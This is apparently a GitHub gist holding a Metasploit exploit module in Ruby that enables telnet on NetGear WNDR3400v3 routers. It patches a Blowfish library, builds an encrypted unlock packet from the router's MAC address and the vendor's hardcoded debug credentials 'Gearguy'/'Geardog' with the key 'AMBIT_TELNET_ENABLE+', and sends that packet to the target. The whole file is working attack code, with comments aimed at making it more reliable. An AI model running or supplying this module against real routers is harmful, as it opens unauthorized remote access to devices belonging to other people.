@carnal0wnage
Forked from phikshun/netgear_telnet_enabler.rb
Last active August 29, 2015 14:06
require 'msf/core'
require 'crypt/blowfish' # sorry, openssl is limited to 16-byte key size :(
# add gem 'crypt', '1.1.4' to Gemfile
module ::Crypt
  class Blowfish
    # Re-opens the `crypt` gem's Blowfish class (pinned to 1.1.4 in the
    # Gemfile note above) to replace its key schedule.
    #
    # The only functional difference from the gem's version is the `.ord`
    # on the key-byte lookup: on Ruby 1.9+ `String#[]` yields a one-character
    # String rather than an Integer, so the gem's shift/OR would fail.
    #
    # NOTE(review): this patch depends on the gem's internals
    # (INITIALSBOXES, INITIALPARRAY, ULONG, encrypt_pair) as they exist in
    # 1.1.4; a different gem version may silently break it, which is why the
    # version is pinned.
    #
    # Standard Blowfish key schedule: XOR the key cyclically into the 18-entry
    # P-array, then repeatedly encrypt a zero block to regenerate P and the
    # four 256-entry S-boxes. Keys longer than the P-array (72 bytes) simply
    # wrap; this is what lets the caller use a key longer than 16 bytes.
    def setup_blowfish()
      @sBoxes = Array.new(4) { |box| INITIALSBOXES[box].clone }
      @pArray = INITIALPARRAY.clone

      # Fold the key into the P-array, four key bytes per 32-bit entry,
      # wrapping around the key when it is exhausted.
      key_index = 0
      18.times do |i|
        word = 0
        4.times do
          word = ((word << 8) | @key[key_index].ord) % ULONG
          key_index = (key_index + 1) % @key.length
        end
        @pArray[i] = (@pArray[i] ^ word) % ULONG
      end

      # Replace each P-array pair with the running encryption of the zero block.
      left = right = 0
      (0...18).step(2) do |i|
        left, right = encrypt_pair(left, right)
        @pArray[i], @pArray[i + 1] = left, right
      end

      # Continue the same chain through every S-box entry.
      4.times do |box|
        (0...256).step(2) do |j|
          left, right = encrypt_pair(left, right)
          @sBoxes[box][j], @sBoxes[box][j + 1] = left, right
        end
      end
    end
  end
end
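class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp

  # Width in bytes of each fixed-size field (MAC, username, password) in the
  # unlock payload. The fields sit back-to-back at fixed offsets, so a longer
  # value would spill into the next slot and yield a key the router never
  # accepts; generate_key rejects such input instead.
  FIELD_WIDTH = 0x10
  # Size of the zero-padded MAC + username + password region.
  CLEARTEXT_LEN = 0x70
  # Total payload size: 16-byte MD5 of the cleartext region, then the region.
  PAYLOAD_LEN = 0x80
  # Blowfish block size.
  BLOCK_LEN = 8

  def initialize(info={})
    super(update_info(info,
      'Name'        => 'NetGear Telnet Enabler',
      'Description' => %q{
        This module enables the telnet service on NetGear routers. Successfully tested on
        a NetGear WNDR3400v3.
      },
      'Author'      => [ 'phikshun' ],
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision: 14774 $',
      'References'  =>
        [
          [ 'NA', 'NA' ],
        ],
      'Platform'    => 'linux',
      'Privileged'  => false,
      'Targets'     =>
        [
          [ 'Netgear WNDR3400v3', { }, ],
        ],
      'DefaultTarget' => 0,
      # NOTE(review): not a date the framework can parse; versions that
      # validate DisclosureDate will reject the module. Replace with the real
      # disclosure date before upstreaming.
      'DisclosureDate' => '0 day, yo'))

    register_options(
      [
        Opt::RPORT(23),
        OptString.new('MAC',  [ true, "The MAC Address of the router LAN interface", nil ]),
        # USER/PASS are the vendor debug credentials the unlock check expects
        # (not the router's admin login). Each must fit in FIELD_WIDTH bytes.
        OptString.new('USER', [ true, "The debug username of the router", 'Gearguy' ]),
        OptString.new('PASS', [ true, "The debug password of the router", 'Geardog' ])
      ], self.class)
  end

  # Build the 128-byte unlock blob sent to the router's telnet-enable listener.
  #
  # Payload layout (byte offsets, every field zero-padded to its slot):
  #   0x00  MD5 of the 0x70-byte cleartext region that follows
  #   0x10  MAC address as 12 upper-case hex digits, no separators
  #   0x20  debug username
  #   0x30  debug password
  #   0x40  zero padding up to 0x80
  # Every 32-bit word is byte-swapped before and after Blowfish-ECB encryption
  # (that is how the layout this code reproduces handles endianness); the
  # Blowfish key is "AMBIT_TELNET_ENABLE+" followed by the password, which is
  # why the (unlimited-key-length) crypt gem is used instead of OpenSSL.
  #
  # @param mac [String] router LAN MAC; ':' '-' '.' separators are accepted
  # @param username [String] debug username
  # @param password [String] debug password
  # @return [String] 128-byte binary payload
  # @raise [ArgumentError] if the MAC does not normalise to 12 hex digits, or
  #   if the username or password exceeds FIELD_WIDTH bytes
  def generate_key(mac, username, password = '')
    normalized_mac = normalize_mac(mac)

    { 'USER' => username, 'PASS' => password }.each do |label, value|
      next if value.bytesize <= FIELD_WIDTH
      raise ArgumentError, "#{label} must be at most #{FIELD_WIDTH} bytes, got #{value.bytesize}"
    end

    cleartext = [normalized_mac, username, password]
      .map { |field| field.ljust(FIELD_WIDTH, "\x00") }
      .join
      .ljust(CLEARTEXT_LEN, "\x00")
      .force_encoding(Encoding::BINARY) # MD5 output is binary; avoid an encoding clash on concat
    md5_key = OpenSSL::Digest::MD5.digest(cleartext)
    payload = swap_words((md5_key + cleartext).ljust(PAYLOAD_LEN, "\x00"))

    blowfish = Crypt::Blowfish.new("AMBIT_TELNET_ENABLE+" + password)
    # Split on byte boundaries rather than with /.{8}/: '.' does not match
    # "\n" (0x0a), so a digest containing that byte would misalign the blocks
    # and silently produce a wrong key roughly 6% of the time.
    ciphertext = payload.bytes.each_slice(BLOCK_LEN).map do |chunk|
      blowfish.encrypt_block(chunk.pack('C*'))
    end.join
    swap_words(ciphertext)
  end

  # Compute the unlock key, deliver it to RPORT and close the connection.
  # The key is built before connecting so bad options fail without touching
  # the target, and the socket is released even if the write raises.
  def exploit
    key = generate_key(datastore['MAC'], datastore['USER'], datastore['PASS'])
    connect
    begin
      sock.put(key)
    ensure
      disconnect
    end
    print_status("Unlock key sent -- try telneting to #{rhost}")
  end

  private

  # Normalise a MAC address to 12 upper-case hex digits.
  # Accepts "AA:BB:CC:DD:EE:FF", "AA-BB-CC-DD-EE-FF", "AABB.CCDD.EEFF" or a
  # bare "AABBCCDDEEFF"; short groups are zero-extended to two digits, as the
  # original implementation did. Returns a new String so the datastore value
  # is never mutated in place.
  #
  # @raise [ArgumentError] on non-hex groups or a result that is not 12 digits
  def normalize_mac(mac)
    hex =
      if mac =~ /[\.\-:]/
        mac.split(/[\.\-:]/).map do |group|
          unless group =~ /\A[0-9a-fA-F]+\z/
            raise ArgumentError, "MAC group #{group.inspect} is not hexadecimal"
          end
          "%02x" % group.to_i(16)
        end.join
      else
        mac.dup
      end
    hex = hex.upcase
    unless hex =~ /\A[0-9A-F]{12}\z/
      raise ArgumentError, "MAC must normalise to 12 hex digits, got #{mac.inspect}"
    end
    hex
  end

  # Byte-swap every 32-bit word (little-endian <-> big-endian). Both the
  # plaintext and the ciphertext go through this, mirroring the layout the
  # router expects. Input length must be a multiple of 4, which the fixed
  # PAYLOAD_LEN guarantees.
  def swap_words(data)
    data.unpack('V*').pack('N*')
  end
end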